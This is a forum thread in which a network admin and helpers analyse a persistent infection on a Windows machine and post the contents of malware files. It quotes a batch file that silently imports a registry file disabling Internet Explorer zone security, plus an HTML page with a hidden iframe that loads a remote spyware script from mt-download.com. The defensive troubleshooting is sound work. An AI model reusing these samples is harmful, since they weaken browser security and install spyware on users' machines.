Possible infection, with odd list of running processes

[squidflakes]

Good afternoon everone,

I've got a remote "super user" who managed to sneak her infected machine on the network, and suddenly, I know exactly which machines got overlooked during the last security scan.

All but one have been cleaned up, but the remaining infected machine is proving to be a tough nut to crack. I've run Sophos and Trend Micro AV against in, followed by a few rounds of AdAware and SpyBot, mixed in with a little CWEBSHREADER. The problems are still there however, and I have identified the following list of files that seem a bit suspicious.

svchosting.exe
command.eve
wserv32.exe
x.bat
yea.reg
staff.html

According to the searches I've done, these files all belong to a number of different (old) virus variants, but I can't seem to find anything that leaves all of the above.
Any thoughts?

[Soda_Popinsky]

Sounds like youve got the scanning tools you need. Have you run those scans in "safe mode" (F8 on boot)? Are you positive that adaware, AVs, and spybot are completely updated? Search for that staff.html file, don't execute it, but read its contents with a plaintext editor like notepad. Same deal with x.bat. It'll help you fingerprint the malware. wserv32.exe looks like it could be trying to act as a webserver, by the name of it. Try browsing to the infected machines address with all scripting off. Obviously I haven't googled the names of those files, but let us know after you have those steps handled.

Also try AVG antivirus, bitdefender AV, ClamAV as other optional scanners.

[Und3ertak3r]

Is the Box fully patched?

wserv32 could be related to this..

http://www.trendmicro.com/vinfo/viru...e=WORM_RBOT.AF
http://www.arkateq.com/virus/698.htm

There are a few "toys" that use x.bat staff.html yea.reg have only seen listings with these no actual information as to what they were..

Command.eve may be related to a image editing prog EVE
http://www.dpspro.com/tcs_commands/tcsos_eve.html

Would be interesting to have a look at the code behind a couple of those..


Cheers

[squidflakes]

Ok, as per Soda's request, I've managed to isolate a few of the files and I'm posting their contents.

First, x.bat

@echo off

REGEDIT.EXE /S YEA.REG

staff.html

x.html

exit

Pretty damn simple. So, lets see what yea.reg does.

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1004"=dword:00000000
"1201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1004"=dword:00000000
"1201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1004"=dword:00000000
"1201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1004"=dword:00000000
"1201"=dword:00000000
"1406"=dword:00000000
"1A04"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1004"=dword:00000000
"1201"=dword:00000000
"1001"=dword:00000000
"1200"=dword:00000000
"1400"=dword:00000000
"1606"=dword:00000000
"1607"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults]
"http"=dword:00000000

I'm not familiar with the way Windows goes about it's registry business, but it looks like these keys are attempting to alter the way Internet Explorer handles it's predefined security zones. Most likely in an attempt to make it eaiser for other bits of malware to gain access to the machine. Just speculation in my part though.

Finally, staff.html
#<html>
#<title> .:[ y E a K u K z ]:. </title>
#<center>
#<body>
#<iframe id="content" style="position:absolute; visibility:hidden;"></iframe>
#<script language="JavaScript" src="http://www.mt-download.com/mtrslib2.js"></script>
#<script language="JavaScript">
#mtrslib_uid = '1677';
#mtrslib_retry = 1;
#mt_set_onload();
#</script>
#</body>
#</center>
#</html>

Not a clue whatmtrslib2.js does, but I've added that domain to the host file on the local machines here, and have it pointed to an internal page.

Any additional thoughts?

[Und3ertak3r]

didn't find my notes at work regarding where I had encountered X.bat and friends.

But I did find mtrslib2.js source

Found this in the body: "MediaTicketsInstallerDemo"

full JS attached

Sry I can't offer better help..



Cheers

Edit: HAd a machine late yesterday that had MediaTickets installed, as there appeared to be no associated uninstaller or menu listing..oh and the customer didn't know what it was.. I removed it... This same machine had a file "USER32.EXE" I think it was in the C:\Windows\System folder.. Any scan I ran on this file was clean.. did a quick check using Fileanalyser.. and it appears to be a component of a Mass mailer or a phone home bug..
Check your system.INI and registry for references to this file.. it loads with explorer.exe

Becareful.. user32.dll is a system file don't confuse it with this file..

[squidflakes]

Originally posted here by Und3ertak3r
didn't find my notes at work regarding where I had encountered X.bat and friends.

But I did find mtrslib2.js source

Found this in the body: "MediaTicketsInstallerDemo"

full JS attached

Sry I can't offer better help..



Cheers

This is great, thank you. I don't have the tools to pull .js apart, so I'm very happy with this.
Looks to be some sort of spyware, but I'm no programmer, so...

Hehe, turns out the kids who wrote this put their real phone number on the domain contact info for mt-download.com.